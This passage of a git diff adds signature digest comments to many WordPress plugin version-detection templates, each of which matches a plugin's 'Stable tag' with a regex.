4b0a00483046022100ebbefc6a807c6bd23bd86dab3c89001c3ec5f6faf5308d73b274cad34e303084022100a57728567639f3f3b088e87f145e715ed47e03e79ec4e493c04d4c9b8ac322bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..3a8c1a73c9 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f214fedc5691c5f4f46c0beec33a5dfd20b4e16074133aef7418b87fe6c778df022100dc4c407f7fd6fd1a732e8a31ad7d1c9ff3af11481fe5c643150ffbd3d5b47da0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..daa2ba2547 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100827b956a9673a995b253e21984263497fdde523996c59486d8b4813f45dc3042022077995ce60b9e594b2a45c5fbd0b616cfea17eaa6dade3c8be8d7ef8bbbead67c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..b5965fc47a 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c926682eda0d1ec2094d5a3d7ef51dd7cdbb925397561b2509f620faf57da46e0220158df0846885639d1bf89aca9455f03c7e0ff68c47b75a03e52b52bc7449737b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..31b78c1001 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022066969876bd10d9d3822ab2f8a81e4d4ac763f6b149333eeda47f91fd95dee7050221008cd7f91c0fd7bcb9b5177d0609312f78bbbff6473a2894a3b3721f0b03e51f81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..951de8fae7 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d76b0eb30f95f7d0aab9205860c5568a9c80a2e6d732a23f8706a8b4e2f27f98022100e0472eff48ecc40a91321697c3835fc79e37f6210a0290c055a2fa5a3aa61fee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..926b44710e 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200f22364981930645b2766d96613990f3d7682768309f5ce258fa3232dcb5b3fe0220125e4ca0af062e997fa18de2645d225e7371ddb69b2e3a4ee8a3711dcf8565f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..f999406c15 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b8fa2ec7428d73441e7f6797644e0bbb77f3b2956220f0070ff22dc4c602ee94022100fde16dbcaf9829feddb4113e946e29741098e397a5c0e795d4dbb28e9913e5d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..66b59892f6 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203d26e6b6e82198049fd0ca9284ccae5d4ff4227a760a20925c41aa4c77aa445402203c4e374726dc71c773f33a060752f594ecab08516268f61e21ebdd841ed5a28b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..aa5a9f3b66 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202395cb44bd98157ab913f454ee4c4732d1b5bfdfef49345b98e34f4c929f36a2022100f06272ba06f67cb359a1ee58f85c91b97d38d90ee96197e36c482b655b3d6123:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..8c7b54907f 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009f31cb01e4818d964a774af34724aa478b1dd7a14f1426e9f6d86b120a87259a022100a1b6ba6f6fb3483c5b7ddcb168bab7e0d95c3483d9d3c3ddebfb4a03fe7b810b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec6..5586c86a4b 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207aaa8650e6f5eea5ef930878653fd37c72126fc4dbbd5705484122c69665935a02207404cb8bc7fb9ff5cdaf80a7fb8379103c6428e7298c8ebc00673987f89bcd39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..758c2635a6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e165bdcfbb3a2534ddea231f7991bf8f6da6930924c0e6139d5d531d3bfc4ec6022054d719d9db13e1c9126f54f2880f175f65d56ff7dee08edbce02963376d20e79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..e4f1eb1ade 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022039073a52eee935e90fe124ad5239cd9a79b963e47d3bc6acc249be84b56dc6fb0221008c2206b997e337b40899bd057c6acc03885d082d2877d9885eef0ab1040d9311:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..4821e31edd 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022021babc508465fe461b8deef9c11b77c71552f670b401e3a17ad2dae4ea7c88530221009748b95ea42a0b91fc7233bfacbc72d45d75a56e7df7ac4a57fd1bbc4e2838b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..a76970fee6 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f7cb7329908a8b83faf3fd8624093ff6461a566d5b54dd34e06e1bf023bf140002204b052066c66b65e216cd6c7ee5e28cf94a886240ae18ea6db173a435cdb9f4b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..87954545c0 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022075f5b959c2e7f2a0c053dc461f3abb786070e7bde321abf6710e501cd7230d560221008ca79e1a039e1395adcba2f2e1188b11acc6ddf1f963e6590fec046e81f6d6b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..f101ea6c12 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eec11a25312a99952471dad21b82222eb9ada030fe0689cdb0387fc86d01477902207a215b102d2ff6976028ba03f0b936e9508d61e6af7f3aa21024d631acd5c4d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..376634e9ee 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022043b30e3194fb083568090154c57f1ccb6d8647420104900367ecda8cef59cf7302200af2d2319790f8304f20f9b920cb0a76fb04309cb96c79cee1ed288ed2141f0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..8cc417afa1 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022078fe92a874fd33856fd3fd22b8f08cfe8277ced883305a8ef4d9b06d35d5b02e02206ae9b5fafebd63dc0626200b2173198e2b68663ece3395b0d402e009aa5e8aad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..671b14e3c8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044021f62fa3cfa2497a9724e9787b969cfc53202776c734888ca0c939a8787125089022100fd741eb36575d578913a8779adb2c8287ea6bef4145c4cbde6fc194fc7cbcd4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..67741836fb 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100be7cf4d7bc6b5c9e5fdc21d5d87fec46eb6d03edac3dca684cf60f22eb906306022100a44e6fcb27558910001c6e5bcf70049326420aa1c816acc90b8a17dc9956f621:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..8beaf781d9 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022039d351f6f33b96431b797d970968a48a2ef97c3fd78991247ceed4c542e726ba02205addd102cb9baec098d5f34721108277380d298fbc10ae0d643b6fb5ba260016:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..29bc7cf3eb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c4612fec6b6ce7b75bb9e224a59481c6fcc859d2620f54583ae907ec9cc0efcb02210080032b30c82439f8069f651dcdf69688af14f9c3684121b31a2078ace188273c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..a1f72f6c94 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022067d5e2ecb50808e7bd42f9d8a3805b412ddbac2221fa9a9272d59a45a25299e2022100c60a428f8d6a7c5b5e7eb515145d72886ffc593a7bb6da54d3bfb3afafb9650a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..1f8a36ee8f 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207ef43f4927aee19a083ee622e52f91b241a77cad6f27467d42f87be5517767b102201eb5d1c4b2a16e66bcbde0f4c85b98e346677332a80f2b3da645dcea2fcbe5ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..3beaf4b59b 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204d6f8e6ec0f2b8d845168f03d3039a3d9017885a0d16ff69b20fdb233923355b02210099080aa5d0dd7e4bef07c0f3cef14a2ead095c65ab64f4c003f690388bf44fe9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..579b74ec57 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b526d02171138745fa9a249b24fab6a0a602178510c1434a651d280f43e01be3022005b753a705ab6258f62054b11e25b6b943a3c7668c7af8fb0d0d6081148d22e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..fbb46ab0c6 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220110fcdfb665a69923450e5a5e65c7fc5709b7a83d65afc7cc4442c00ef677642022100a826bf164f36b0a610d45963f90dcd79971eb7e72e2f90724889ef0afba5ccdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index f7c9ef9b1f..7389914264 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dcfa521bdf04fd537d23bc73495fa5251de3366fc48490a8f6769b52c88aa4c9022100ac4802ec41a0f78031abb505ae58ff1537ec9f92c151c998be63d1412ccbee3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..70804e6569 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b98ed489e8837e5e8464deb76c04c41816faa0c0639a00b91275e47a0e99ab2c022077ba8dece8d96e936e1b49ea6e026ba4bf49892454d21d374c778a8dcb7f4eb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..0c7677c58a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204fecb2483d0ded61770f72204b5961ef4ec76e48e97c726bf96ea3c4981c0038022100cea60f16271f5352487176b8956f40eb45c5f85bf5cae35cecb7417b8030ceaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..c05dd7608a 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cc6c29b5e90735e9c3dcc76aabcd364a6568ea608d9f272012032f9504dd2d7c022100b382a1f36280deb5a7bb3eee1cf9a32d9e79cadfd4c4848785ac59276f8d50f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..454a7d45e8 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204adba98fd71fa8a8ff4138ddbb4d66fdc260930ee2a4f3692b56e9c3d2f9db6c0220333ad5cb20f462a863f2f22f19cb1b8e9e3613a2fadcb21782ec70826524209e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..0b989d40cd 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203162e6d507fa2065dceb274fee0c1e88f0f843fc89719a39397c174d35e7f17d022100a212ad0ef0010cdc7f33ddb9b4e9164ac0ac40f5e66cd54647bfebfd12f4787b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..d73768c853 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205f6a0162536a3e13657fda503c3b80751cf9f65b255db71ce21c8abe6e8ccb4c022100b2377418a29e6ec5c6d2ef66b0bb8b816b946d5eb9672d974d9dc50dae73fb9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..5f0ead2179 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022023f81ed547f1b1d4f3438f5b04619134fa17c2ad7a6016ad5ba522bf28b969be02210098d3feeaf4e4badaae082631c262d80a5792e983bdf2d83c49f232f8c36ec82c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index a773829b7d..197d800322 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022002e939ec037724f644121ee146bd8c2c808249a74a046a0fcd838a96a83f4bc0022100f9b168afefc80090c019c43becd7b17683a0ed729d9f90696d261be4e91a2ce8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..e48c85bc92 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202ef5f989fbbf47e642dc4609cedc589bce5a8ceae2b766d5d962ff0f52e93c890220196f7ff8bb37c6610a8aba44c8b3f53504ec018ad1df5d654dbec8f32efbd0aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..954778c2a5 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dfafc6338373c20d7e5ab64b5e7f0f1e3aa1d2a55f15a2bb14b489c0adcfb9d002206bbf7ed6c17abfb80ad0959f769357e2adc4204846108461ed85df8d84e6a638:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..e02e6336ac 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f6abc19cd8df4ce08106fbf1016000c41152b7a0beb6917ddd97819dc5b2300602210093181b31c61cc26f9d434d22f168ce2965d9dd1b992ad56b5f20a56678f11f7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..f232f0bb91 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204547c8bff7cacd39096f97afce31944247376a4c37dc880c0b97b3a00877eab5022100cc205ad903b8f26e9663d9ab89d37e0e15f783a1fecb129e20cfc29d93762e47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..9074cc2da3 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204e31a620869722a70870c90fc752e45974a58da95cd4143810911a7a89060c43022100f714d49414e6e3fa8f484d0321a373ba9e13dfdc57a1a60c53aca7bffa6f2e9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..a987b10447 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204d38df13848ecb58f993408aa73d520d8b1832ff9c8c07d828b372ed4420a1750220431c66f50af36beb58084c534eba608c1faa4d02d232c0037f9ea60bcf29f3b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..717a3f9aa4 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220018843c375bedeedd4915b0e2181f7d46a3bad04fed0615127dcef77461f341202201eccd9aa408f3aa07e3bc4be49c3e6c33f40b70fd1eab3972ca6925f5fdee736:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..77168a9748 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d1337538afce4b1fd4b3993a1182a97ad787979c01341fd23f81c36c4aa6447702207494ab6f0e754dcc9d68ea1b6ef367eb01e90dd3692ad09c3e615d36eca37299:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..562bf3983e 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 